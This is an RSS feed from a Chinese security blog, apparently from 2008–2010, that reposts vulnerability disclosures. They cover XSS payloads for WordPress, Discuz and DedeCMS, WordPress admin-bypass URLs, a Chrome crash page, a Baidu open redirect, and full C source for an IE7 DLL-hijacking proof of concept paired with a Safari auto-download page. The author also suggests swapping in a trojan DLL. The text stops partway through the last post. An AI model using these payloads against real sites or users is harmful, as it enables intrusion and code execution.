<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Lin&#039;s Space&#124;Only &#187; 漏洞</title>
	<atom:link href="http://clin003.com/category/exploits/feed/" rel="self" type="application/rss+xml" />
	<link>http://clin003.com</link>
	<description>If you my only , I will give you my all.</description>
	<lastBuildDate>Thu, 02 Sep 2010 07:07:24 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>今日杂碎：近来WordPress，DEDECMS，Discuz程序爆出的漏洞</title>
		<link>http://clin003.com/exploits/wordpress292-dedecms55-discuz172-exploit-1905/</link>
		<comments>http://clin003.com/exploits/wordpress292-dedecms55-discuz172-exploit-1905/#comments</comments>
		<pubDate>Fri, 02 Apr 2010 18:10:45 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[漏洞]]></category>
		<category><![CDATA[Discuz]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[跨站漏洞]]></category>

		<guid isPermaLink="false">http://clin003.com/?p=1905</guid>
		<description><![CDATA[以下罗列的是近两个月内的相关程序漏洞。。 WordPress漏洞，影响版本为2.9.2及以下版本 Published:2010-03-17，WordPress2.9.2跨站漏洞描述： 北洋贱队(http://bbs.seceye.org)2010-03-17首发 wordpress2.9.2在使用管理员模式发表新文章或者回复的地方，插入跨站语句可导致触发跨站脚本攻击。 1.发表新文章在标题处插入如： &#60;iframe src=http://http://clin003.com&#62;即可导致跨站。 另WP2.9.2版本存在爆路径的bug，忘各位使用wp的朋友注意安全。 Published:2010-03-22，WordPress &#60;= 2.9.2绕过口令保护漏洞描述： 每个页面可以设置口令，这些口令可以相同，但通过口令访问的功能设置了全站点都通用的全局Cookie，因此用户只要获得了一个对页面或帖子所设置的口令，就可以看到所有受保护的页面或帖子（在请求时会自动许可访问）。 Discuz! 所有版本永久型跨站漏洞 Discuz! 个人中心里的“个人签名”没有对恶意代码进行检测，在 Discuz! 及 img 代码禁用的情况下仍可写入恶意代码，Discuz! 会保存并执行该代码，形成永久型跨站。 测试代码：&#60;/textarea&#62;&#60;script&#62;alert(/Liscker/);&#60;/script&#62;&#60;textarea&#62; 临时解决办法：禁止用户使用个人签名。 dedecms织梦 v5.5 两处跨站漏洞 北洋贱队2010-02-06首发 演示1(代码里的回车自行去掉):http://www.dedecms.com/plus/search.php?keyword=%22%3E%3Ciframe%20src=http://clin003.com%3E&#38; searchtype=titlekeyword&#38;channeltype=0&#38;orderby=&#38; kwtype=1&#38;pagesize=10&#38;typeid=0&#38;TotalResult=%3C iframe%20src=http://clin003.com%3E&#38;PageNo=2 演示2:http://www.dedecms.com/plus/list.php?tid=6&#38;TotalResult=%3Ciframe%20src=http://clin003.com%3E&#38; nativeplace=0&#38;infotype=0&#38;keyword=&#38;orderby=hot&#38; PageNo=2 解决办法：官方已有相关补丁文件 http://bbs.dedecms.com/222197.html (貌似并未完整修复) Related posts:WordPress &#8230; <a href="http://clin003.com/exploits/wordpress292-dedecms55-discuz172-exploit-1905/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>以下罗列的是近两个月内的相关程序漏洞。。</p>
<p><strong>WordPress漏洞，影响版本为2.9.2及以下版本</strong></p>
<p>Published:2010-03-17，WordPress2.9.2跨站漏洞描述：<br />
北洋贱队(http://bbs.seceye.org)2010-03-17首发<br />
wordpress2.9.2在使用管理员模式发表新文章或者回复的地方，插入跨站语句可导致触发跨站脚本攻击。<br />
1.发表新文章在标题处插入如： &lt;iframe src=http://http://clin003.com&gt;即可导致跨站。<br />
另WP2.9.2版本存在爆路径的bug，忘各位使用wp的朋友注意安全。</p>
<p>Published:2010-03-22，WordPress &lt;=  2.9.2绕过口令保护漏洞描述：<br />
每个页面可以设置口令，这些口令可以相同，但通过口令访问的功能设置了全站点都通用的全局Cookie，因此用户只要获得了一个对页面或帖子所设置的口令，就可以看到所有受保护的页面或帖子（在请求时会自动许可访问）。</p>
<p><strong>Discuz! 所有版本永久型跨站漏洞</strong></p>
<p>Discuz! 个人中心里的“个人签名”没有对恶意代码进行检测，在 Discuz! 及 img 代码禁用的情况下仍可写入恶意代码，Discuz! 会保存并执行该代码，形成永久型跨站。</p>
<p>测试代码：&lt;/textarea&gt;&lt;script&gt;alert(/Liscker/);&lt;/script&gt;&lt;textarea&gt;</p>
<p>临时解决办法：禁止用户使用个人签名。</p>
<p><strong>dedecms织梦 v5.5 两处跨站漏洞</strong></p>
<p>北洋贱队2010-02-06首发</p>
<p>演示1(代码里的回车自行去掉):http://www.dedecms.com/plus/search.php?keyword=%22%3E%3Ciframe%20src=http://clin003.com%3E&amp;<br />
searchtype=titlekeyword&amp;channeltype=0&amp;orderby=&amp;<br />
kwtype=1&amp;pagesize=10&amp;typeid=0&amp;TotalResult=%3C<br />
iframe%20src=http://clin003.com%3E&amp;PageNo=2</p>
<p>演示2:http://www.dedecms.com/plus/list.php?tid=6&amp;TotalResult=%3Ciframe%20src=http://clin003.com%3E&amp;<br />
nativeplace=0&amp;infotype=0&amp;keyword=&amp;orderby=hot&amp;<br />
PageNo=2</p>
<p>解决办法：官方已有相关补丁文件 http://bbs.dedecms.com/222197.html (貌似并未完整修复)</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/exploits/wordpress-photo-album-remote-sql-injection-vulnerability-451/" rel="bookmark" title="Permanent Link: WordPress Photo album Remote SQL Injection Vulnerability">WordPress Photo album Remote SQL Injection Vulnerability</a></li><li><a href="http://clin003.com/exploits/wordpress-2-8-1-security-bypass-0day-1763/" rel="bookmark" title="Permanent Link: WordPress < 2.8.1 Security Bypass 0day">WordPress < 2.8.1 Security Bypass 0day</a></li><li><a href="http://clin003.com/wp-use/wordpress262-upgrade-1475/" rel="bookmark" title="Permanent Link: 升级WordPress2.6.2">升级WordPress2.6.2</a></li><li><a href="http://clin003.com/wp-use/security-fix-for-wordpress-263-release-1598/" rel="bookmark" title="Permanent Link: 今日杂碎：更新WordPress 2.6.5">今日杂碎：更新WordPress 2.6.5</a></li><li><a href="http://clin003.com/exploits/it-is-still-heaven-for-spyware-writers-1249/" rel="bookmark" title="Permanent Link: Safari for windows默认配置+ie浏览器——>木马作者的天堂">Safari for windows默认配置+ie浏览器——>木马作者的天堂</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/exploits/wordpress292-dedecms55-discuz172-exploit-1905/" >http://clin003.com/exploits/wordpress292-dedecms55-discuz172-exploit-1905/</a> <br /> <a href="http://clin003.com/exploits/wordpress292-dedecms55-discuz172-exploit-1905/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/exploits/wordpress292-dedecms55-discuz172-exploit-1905/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordPress &lt; 2.8.1 Security Bypass 0day</title>
		<link>http://clin003.com/exploits/wordpress-2-8-1-security-bypass-0day-1763/</link>
		<comments>http://clin003.com/exploits/wordpress-2-8-1-security-bypass-0day-1763/#comments</comments>
		<pubDate>Wed, 22 Jul 2009 16:32:30 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[wordpress支持]]></category>
		<category><![CDATA[漏洞]]></category>
		<category><![CDATA[Security Bypass 0day]]></category>

		<guid isPermaLink="false">http://clin003.com/?p=1763</guid>
		<description><![CDATA[发布时间:2009-07-22 测试方法: 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! Wordpress &#60; 2.8.1 All Version suffer from admin module configuration security bypass exploit , attackers use these urls to attack the blog. http://xxx.com/wp-admin/admin.php?page=/collapsing-archives/options.txt http://xxx.com/wp-admin/admin.php?page=akismet/readme.txt http://xxx.com/wp-admin/admin.php?page=related-ways-to-take-action/options.php http://xxx.com/wp-admin/admin.php?page=wp-security-scan/securityscan.php It is harmful.Please update your blog as soon as you can. &#8230; <a href="http://clin003.com/exploits/wordpress-2-8-1-security-bypass-0day-1763/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>发布时间:2009-07-22<br />
测试方法:</p>
<p>本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!<br />
Wordpress &lt; 2.8.1 All Version suffer from admin module configuration security bypass exploit , attackers use these urls to attack the blog.</p>
<p>http://xxx.com/wp-admin/admin.php?page=/collapsing-archives/options.txt</p>
<p>http://xxx.com/wp-admin/admin.php?page=akismet/readme.txt</p>
<p>http://xxx.com/wp-admin/admin.php?page=related-ways-to-take-action/options.php</p>
<p>http://xxx.com/wp-admin/admin.php?page=wp-security-scan/securityscan.php</p>
<p>It is harmful.Please update your blog as soon as you can.</p>
<p>// sebug.net [2009-07-22]</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/wp-use/upgrading-wordpress-263-1550/" rel="bookmark" title="Permanent Link: 紧急更新至WordPress 2.6.3">紧急更新至WordPress 2.6.3</a></li><li><a href="http://clin003.com/wp-use/wordpress-2-8-6-security-release-1838/" rel="bookmark" title="Permanent Link: 升级到 WordPress 2.8.6">升级到 WordPress 2.8.6</a></li><li><a href="http://clin003.com/wp-use/security-fix-for-wordpress-263-release-1598/" rel="bookmark" title="Permanent Link: 今日杂碎：更新WordPress 2.6.5">今日杂碎：更新WordPress 2.6.5</a></li><li><a href="http://clin003.com/wp-use/multi-user-group-structures-wordpress-blog-204/" rel="bookmark" title="Permanent Link: 多用户的WordPress博客群搭建（WordPress Mu）">多用户的WordPress博客群搭建（WordPress Mu）</a></li><li><a href="http://clin003.com/wp-use/learning-wordpress-security-whitepaper-1438/" rel="bookmark" title="Permanent Link: 学习 WordPress安全白皮书">学习 WordPress安全白皮书</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/exploits/wordpress-2-8-1-security-bypass-0day-1763/" >http://clin003.com/exploits/wordpress-2-8-1-security-bypass-0day-1763/</a> <br /> <a href="http://clin003.com/exploits/wordpress-2-8-1-security-bypass-0day-1763/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/exploits/wordpress-2-8-1-security-bypass-0day-1763/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>未定义操作导致谷歌浏览器崩溃，囧</title>
		<link>http://clin003.com/exploits/google-chrome-crashes-with-all-tabs-with-an-undefined-handler-followed-by-a-special-character-1464/</link>
		<comments>http://clin003.com/exploits/google-chrome-crashes-with-all-tabs-with-an-undefined-handler-followed-by-a-special-character-1464/#comments</comments>
		<pubDate>Wed, 03 Sep 2008 09:46:25 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[今日一点]]></category>
		<category><![CDATA[漏洞]]></category>
		<category><![CDATA[谷歌浏览器]]></category>

		<guid isPermaLink="false">http://clin003.com/?p=1464</guid>
		<description><![CDATA[哎呀!谷歌浏览器崩溃了，现在重新启动？ 影响版本： Google Chrome Browser 0.2.149.27 谷歌浏览器 0.2.149.27 测试环境： windows xp sp3 windows 2003 sp1 问题： An issue exists in how chrome behaves with undefined-handlers in chrome.dll version 0.2.149.27. A crash can result without user interaction. When a user is &#8230; <a href="http://clin003.com/exploits/google-chrome-crashes-with-all-tabs-with-an-undefined-handler-followed-by-a-special-character-1464/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>哎呀!谷歌浏览器崩溃了，现在重新启动？</p>
<p>影响版本：<br />
Google Chrome Browser 0.2.149.27<br />
谷歌浏览器  0.2.149.27</p>
<p>测试环境：<br />
windows xp sp3<br />
windows 2003 sp1</p>
<p>问题：</p>
<blockquote><p>An issue exists in how chrome behaves with undefined-handlers in chrome.dll version 0.2.149.27. A crash can result without user interaction. When a user is made to visit a malicious link, which has an undefined handler followed by a &#8216;special&#8217; character, the chrome crashes with a Google Chrome message window &#8220;Whoa! Google Chrome has crashed. Restart now?&#8221;. It crashes on &#8220;int 3&#8243; at 0x01002FF3 as an exception/trap, followed by &#8220;POP EBP&#8221; instruction when pointed out by the EIP register at 0x01002FF4.</p></blockquote>
<p>描述地址：<a href="http://evilfingers.com/advisory/google_chrome_poc.php">http://evilfingers.com/advisory/google_chrome_poc.php</a></p>
<p><a href="http://img.clin003.com/wp-content/uploads/2008/09/google-chrome.jpg"><img class="alignnone size-medium wp-image-1465" title="google-chrome" src="http://img.clin003.com/wp-content/uploads/2008/09/google-chrome-300x201.jpg" alt="" width="300" height="201" /></a></p>
<p>演示代码：</p>
<blockquote><p>&lt;html&gt;<br />
&lt;head&gt;&lt;/head&gt;<br />
&lt;body&gt;<br />
demo &lt;a href=&#8221;hello:%&#8221;&gt;HERE&lt;/a&gt;</p>
<p>&lt;iframe src=&#8221;Free Coupwns!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.jar&#8221; frameborder=0 width=0 height=0&gt;&lt;/iframe&gt;<br />
&lt;/body&gt;<br />
&lt;/html&gt;</p></blockquote>
<p>关于Google chrome基于WebKit 525.13 (Safari 3.1)导致的<a title="Permanent Link to Google Chrome vulnerable to carpet-bombing flaw" rel="bookmark" href="http://blogs.zdnet.com/security/?p=1843">Google Chrome vulnerable to carpet-bombing flaw</a> 漏洞演示代码（一并看上边的演示代码），默认设置Google chrome是不提示自动下载回来的，只需要“中级用户选项”修改勾上“下载前询问每个文件的保存位置”，就可以躲过这个漏洞的侵害（PS：这样你就会收到提示保存位置，你就知道有个文件要下载来的，不然你不知不觉Google chrome就帮你下载啦）。</p>
<p>更多提示“<a href="http://www.google.com/search?client=pub-3938365705781251&amp;forid=1&amp;prog=aff&amp;channel=4834034790&amp;ie=&amp;oe=UTF-8&amp;hl=zh-CN&amp;q=%E5%93%8E%E5%91%80!%E8%B0%B7%E6%AD%8C%E6%B5%8F%E8%A7%88%E5%99%A8%E5%B4%A9%E6%BA%83%E4%BA%86%EF%BC%8C%E7%8E%B0%E5%9C%A8%E9%87%8D%E6%96%B0%E5%90%AF%E5%8A%A8%EF%BC%9F">哎呀!谷歌浏览器崩溃了，现在重新启动？</a>”</p>
<hr /><h2>Comments</h2><ul><li><a href="http://clin003.com/exploits/google-chrome-crashes-with-all-tabs-with-an-undefined-handler-followed-by-a-special-character-1464/#comment-1267">September  3, 2008</a>, <a href='http://mygogou.com/mm-388' rel='external nofollow' class='url'>谷歌浏览器Chrome首日安全漏洞 | 我的爬行JI</a> writes: [...] 第一个未定义操作导致谷歌浏览器崩溃，囧，特意构造的链接地址可以对谷歌浏览器进行拒绝服务攻击，后果很严重  ： An issue exists in how chrome behaves with undefined-handlers in chrome.dll version 0.2.149.27. A crash can result without user interaction. When a user is made to visit a malicious link, which has an undefined handler followed by a ’special’ character, the chrome crashes with a Google Chrome message window “Whoa! Google Chrome has crashed. Restart now?”. [...]</li><li><a href="http://clin003.com/exploits/google-chrome-crashes-with-all-tabs-with-an-undefined-handler-followed-by-a-special-character-1464/#comment-1294">September  11, 2008</a>, <a href='http://mygogou.com/mm-409' rel='external nofollow' class='url'>Google悄然升级Chrome 修复安全漏洞 | 我的爬行JI</a> writes: [...] 经测试，在首日以及接着发现的三个漏洞均已得到修复，据悉，Google上周五以0.2.149.29新版本取代0.2.149.27，最初只是提供给部分用户，但Google并没有透露此次更新细节。 [...]</li></ul><hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/suggested-contents/chrome-extensions-1985/" rel="bookmark" title="Permanent Link: 推荐几个有趣的Chrome 扩展程序(SEO工具插件)">推荐几个有趣的Chrome 扩展程序(SEO工具插件)</a></li><li><a href="http://clin003.com/ideas/www-google-com-chrome-1461/" rel="bookmark" title="Permanent Link: 体验谷歌浏览器(Google Chrome)">体验谷歌浏览器(Google Chrome)</a></li><li><a href="http://clin003.com/wp-use/deactivate-dropcap-first-character-483/" rel="bookmark" title="Permanent Link: 刚刚Deactivate啦DropCap First Character  	1.0.1">刚刚Deactivate啦DropCap First Character  	1.0.1</a></li><li><a href="http://clin003.com/debug/br-with-small-css-line-height-value-is-not-respected-by-the-renderer-1953/" rel="bookmark" title="Permanent Link: 当line-height小于18px时Chrome及webkit核心浏览器渲染问题">当line-height小于18px时Chrome及webkit核心浏览器渲染问题</a></li><li><a href="http://clin003.com/search-engine/ssl-search-1960/" rel="bookmark" title="Permanent Link: 使用Google 加密搜索功能（Firefox插件、Chrome扩展）">使用Google 加密搜索功能（Firefox插件、Chrome扩展）</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/exploits/google-chrome-crashes-with-all-tabs-with-an-undefined-handler-followed-by-a-special-character-1464/" >http://clin003.com/exploits/google-chrome-crashes-with-all-tabs-with-an-undefined-handler-followed-by-a-special-character-1464/</a> <br /> <a href="http://clin003.com/exploits/google-chrome-crashes-with-all-tabs-with-an-undefined-handler-followed-by-a-special-character-1464/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/exploits/google-chrome-crashes-with-all-tabs-with-an-undefined-handler-followed-by-a-special-character-1464/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Safari for windows默认配置+ie浏览器——&gt;木马作者的天堂</title>
		<link>http://clin003.com/exploits/it-is-still-heaven-for-spyware-writers-1249/</link>
		<comments>http://clin003.com/exploits/it-is-still-heaven-for-spyware-writers-1249/#comments</comments>
		<pubDate>Wed, 11 Jun 2008 08:41:32 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[今日一点]]></category>
		<category><![CDATA[漏洞]]></category>
		<category><![CDATA[病毒学习]]></category>
		<category><![CDATA[combined attack]]></category>
		<category><![CDATA[混合漏洞攻击]]></category>

		<guid isPermaLink="false">http://clin003.com/?p=1249</guid>
		<description><![CDATA[Nitesh Dhanjani 发现的这个（windows版的safari浏览器在不经用户确认的情况下把文件下载到用户桌面）漏洞。标题为&#8221;Safari Carpet Bomb&#8221;的介绍可以在Nitesh Dhanjani博客看到，接着微软就发出一份（标题为：Blended Threat from Combined Attack Using Apple’s Safari on the Windows Platform）“安全公告”。Aviv Raff在他的博客发表“Safari pwns Internet Explorer”澄清这个（MS）漏洞早在2006年就已经报告过。 关于这个混合Safari和IE漏洞攻击的分析 这个IE老的漏洞Aviv Raff在他的两篇博客中已经做过比较详细的描述&#8221;Internet Explorer 7 &#8211; Still Spyware Writers Heaven&#8220;，和&#8221;IE7 DLL-load hijacking Code Execution Exploit PoC&#8221; 漏洞演示代码可以在&#8221;milw0rm&#8221;找到。 这个漏洞主要出在：ie（Windows Internet &#8230; <a href="http://clin003.com/exploits/it-is-still-heaven-for-spyware-writers-1249/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Nitesh Dhanjani 发现的这个（windows版的safari浏览器在不经用户确认的情况下把文件下载到用户桌面）漏洞。标题为&#8221;Safari Carpet Bomb&#8221;的介绍可以在Nitesh Dhanjani博客看到，接着微软就发出一份（标题为：Blended Threat from Combined Attack Using Apple’s Safari on the Windows Platform）“安全公告”。Aviv Raff在他的博客发表“Safari pwns Internet Explorer”澄清这个（MS）漏洞早在2006年就已经报告过。</p>
<p><strong>关于这个混合Safari和IE</strong><strong>漏洞攻击的分析</strong></p>
<p>这个IE老的漏洞Aviv Raff在他的两篇博客中已经做过比较详细的描述&#8221;<span class="TitleLinkStyle">Internet Explorer 7 &#8211; Still Spyware Writers Heaven</span>&#8220;，和&#8221;<span class="TitleLinkStyle">IE7 DLL-load hijacking Code Execution Exploit PoC</span>&#8221; 漏洞演示代码可以在&#8221;milw0rm&#8221;找到。</p>
<p>这个漏洞主要出在：ie（Windows Internet Explorer）优先从“用户桌面”加载动态链接库文件（dll），而不是从程序目录（一般是：C:\WINDOWS\SYSTEM32）。</p>
<p>windows版的safari浏览器在没有得到确认的情况下自动下载文件到用户桌面是这次引发windows用户遭受攻击的前因。当动态链接库文件（DLL文件）为特定的名称时打开ie将从这里（用户桌面）加载这些动态链接库文件。两件事情混合起来就是：IE加载运行safari自动下载到用户桌面的动态链接库文件，最终导致用户遭受恶意攻击。</p>
<p>作为演示下边为LIUDIEYU写的演示代码（ie加载后调用记事本打开一个不存在的文件）</p>
<p>另外Aviv Raff也写过个演示代码可以在&#8221;milw0rm&#8221;找到。</p>
<p>（PS：其实你可以写个木马后门dll扔出去让他运行！！）</p>
<pre>/*
        Copyright (C) 2006-2007 Aviv Raff

http://aviv.raffon.net

        Greetz: hdm, L.M.H, str0ke, SkyLined

        Compile and upload to the victim's desktop as one of the following hidden DLL files:
        - sqmapi.dll
        - imageres.dll
        - schannel.dll

        Run IE7 and watch the nice calculators pop up.
        Filter fdwReason to execute only once.

        Tested on WinXP SP2 with fully patched IE7.
        For testing/educational purpose only!

*/

#include &lt;windows.h&gt;

BOOL WINAPI DllMain(
  HINSTANCE hinstDLL,
  DWORD fdwReason,
  LPVOID lpvReserved
)
{
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    TCHAR windir[_MAX_PATH];
    TCHAR cmd[ _MAX_PATH ];
    GetEnvironmentVariable("WINDIR",windir,_MAX_PATH );
    wsprintf(cmd,"%s\\system32\\calc.exe",windir);
    ZeroMemory(&amp;si,sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(π,sizeof(pi));
    CreateProcess(NULL,cmd,NULL,NULL,FALSE,0,NULL,NULL,&amp;si,π);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return TRUE;
}

// milw0rm.com [2006-12-14]</pre>
<p><span style="font-size: large;">&#8212;&#8212;&#8212;-dll.c&#8212;&#8212;&#8212;-</span><br />
#include &lt;windows.h&gt;</p>
<p>BOOL APIENTRY DllMain(<br />
HINSTANCE hinstDLL,<br />
DWORD fdwReason,<br />
LPVOID lpvReserved<br />
)<br />
{<br />
STARTUPINFO si;<br />
PROCESS_INFORMATION pi;</p>
<p>ZeroMemory(&amp;si,sizeof(si));<br />
si.cb = sizeof(si);<br />
ZeroMemory(π,sizeof(pi));</p>
<p>CreateProcess(NULL,&#8221;NOTEPAD \&#8221;=====(((((we are in)))))=====\&#8221;",NULL,NULL,FALSE,0,NULL,NULL,&amp;si,π);<br />
CloseHandle(pi.hProcess);<br />
CloseHandle(pi.hThread);<br />
return TRUE;<br />
}</p>
<p>你可以编译这个库文件并命名为&#8221;schannel.dll&#8221;，“sqmapi.dll”或“imageres.dll”就可以利用啦。</p>
<p><span style="font-size: large;">&#8212;&#8212;&#8212;-index.html&#8212;&#8212;&#8212;-</span><br />
&lt;html&gt;&lt;head&gt;<br />
&lt;title&gt;Test safari downloads automatically&lt;/title&gt;<br />
&lt;/head&gt;&lt;body&gt;<br />
只要使用Safari打开这个页面，同时schannel.dll将自动下载到用户桌面&lt;br&gt;<br />
&lt;iframe src=&#8221;schannel.dll&#8221; width=1 height=1&gt;&lt;/iframe&gt;&lt;br&gt;</p>
<p>打开ie，将会看到效果（ie远程调用记事本打开一个不存在的文件）</p>
<p>&lt;i&gt;这就是结果.&lt;/i&gt;&lt;br&gt;<br />
&lt;br&gt;<br />
这个测试只能使用一次&lt;br&gt;<br />
&lt;/body&gt;&lt;/html&gt;</p>
<p>PS:个人认为这个组合漏洞攻击应该算是小概率事件，比如使用safari的用户很少情况会切换到ie，还有如果恶意攻击者，把文件显眼的下到用户桌面（对于这么明显的可疑文件很容易被删除的，如果隐藏怎么办呢？！）。不论怎样这是个潜在的危险（如果下次不是Safari呢？）。</p>
<p>PS2：这是不是也提醒程序员同学们写代码时要考虑自己的库文件搜索路径问题了，当前目录最多的情况应该是桌面啦，当然这涉及到windows内核（..）的问题（加载动态链接库的时候搜索路径的顺序——当前目录，程序目录，系统目录，谁先谁后？）</p>
<p>相关地址：</p>
<p>http://www.dhanjani.com/archives/2008/05/safari_carpet_bomb.html</p>
<p>http://www.microsoft.com/technet/security/advisory/953818.mspx</p>
<p>http://liudieyu0.blog124.fc2.com/blog-entry-1.html</p>
<p>http://www.dhanjani.com/archives/2008/05/safari_carpet_bomb.html</p>
<p>http://aviv.raffon.net/2008/05/31/SafariPwnsInternetExplorer.aspx</p>
<p>http://aviv.raffon.net/2006/12/14/IE7DLLloadHijackingCodeExecutionExploitPoC.aspx</p>
<p>http://aviv.raffon.net/2006/11/01/InternetExplorer7StillSpywareWritersHeaven.aspx</p>
<p>http://milw0rm.org/exploits/2929</p>
<p>演示地址：http://liudieyu.com/iesafari200806.2885391780966027/</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/ideas/sorry-unable-to-process-request-at-this-time-error-999-1993/" rel="bookmark" title="Permanent Link: Yahoo！Sorry, Unable to process request at this time &#8212; error 999.">Yahoo！Sorry, Unable to process request at this time &#8212; error 999.</a></li><li><a href="http://clin003.com/suggested-contents/download-youtube-video-by-tools-flvplay-1243/" rel="bookmark" title="Permanent Link: 又一下载YouTube视频利器FLVPlay">又一下载YouTube视频利器FLVPlay</a></li><li><a href="http://clin003.com/safe/anti-virus-history-of-philosophy-present-and-future-111/" rel="bookmark" title="Permanent Link: 反病毒理念、历史、现状与未来">反病毒理念、历史、现状与未来</a></li><li><a href="http://clin003.com/rootkit/rootkit-related-links-36/" rel="bookmark" title="Permanent Link: Rootkit相关链接">Rootkit相关链接</a></li><li><a href="http://clin003.com/suggested-contents/internet-explorer-faq-146/" rel="bookmark" title="Permanent Link: Internet Explorer问题集">Internet Explorer问题集</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/exploits/it-is-still-heaven-for-spyware-writers-1249/" >http://clin003.com/exploits/it-is-still-heaven-for-spyware-writers-1249/</a> <br /> <a href="http://clin003.com/exploits/it-is-still-heaven-for-spyware-writers-1249/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/exploits/it-is-still-heaven-for-spyware-writers-1249/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>百度搜索联盟广告跨站漏洞</title>
		<link>http://clin003.com/exploits/baidu-search-advertising-across-union-station-loopholes-792/</link>
		<comments>http://clin003.com/exploits/baidu-search-advertising-across-union-station-loopholes-792/#comments</comments>
		<pubDate>Thu, 10 Apr 2008 09:02:26 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[今日一点]]></category>
		<category><![CDATA[漏洞]]></category>
		<category><![CDATA[CSRF]]></category>
		<category><![CDATA[百度]]></category>

		<guid isPermaLink="false">http://clin003.com/?p=792</guid>
		<description><![CDATA[cb上的广告链接觉得好奇就移动鼠标看看，然后使用广告地址替换后边的广告网站地址为我的地址照样跳转成功 （ps:目前还没搞清是百度联盟的认证广告还是什么广告，总之不是百度的主题推广广告，偶看到的这个广告是图片形式的） 原始广告地址：http://spcode.baidu.com/spcode/spClick?tn=ugmbbc_sp&#38;ctn=0&#38;styleid=1470&#38;tourl=http://wopti.e78.com/channel.php?c=ugmbbc_spBAIDU_ANDu=1010 修改后可以被利用的地址：http://spcode.baidu.com/spcode/spClick?tourl=http://clin003.com/ 这个地址可以根据原始地址改造，我挑选啦不出错的地址（主要看你的地址对这个参数的反应！） 通过搜索引擎得知是百度联盟的广告地址 百度联盟认证地址：http://spcode.baidu.com/ 百度联盟地址：http://union.baidu.com/ 下边是截图： Related posts:百度秘密收集用户查询历史推送相关广告（个性化服务？）百度跨站漏洞：当前日期(date): 2007-11-24 星期六腾讯体验中心跨站漏洞及利用想法添加百度博客搜索ping服务从百度导入的IP基本恢复！Copyright &#169; 2007-2010 This feed is building by Lin's Space&#124;Only .本文地址：http://clin003.com/exploits/baidu-search-advertising-across-union-station-loopholes-792/ 雁过留言. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)]]></description>
			<content:encoded><![CDATA[<p>cb上的广告链接觉得好奇就移动鼠标看看，然后使用广告地址替换后边的广告网站地址为我的地址照样跳转成功</p>
<p>（ps:目前还没搞清是百度联盟的认证广告还是什么广告，总之不是百度的主题推广广告，偶看到的这个广告是图片形式的）</p>
<p>原始广告地址：http://spcode.baidu.com/spcode/spClick?tn=ugmbbc_sp&amp;ctn=0&amp;styleid=1470&amp;tourl=http://wopti.e78.com/channel.php?c=ugmbbc_spBAIDU_ANDu=1010</p>
<p>修改后可以被利用的地址：http://spcode.baidu.com/spcode/spClick?tourl=http://clin003.com/</p>
<p>这个地址可以根据原始地址改造，我挑选啦不出错的地址（主要看你的地址对这个参数的反应！）</p>
<p>通过搜索引擎得知是百度联盟的广告地址</p>
<p>百度联盟认证地址：http://spcode.baidu.com/</p>
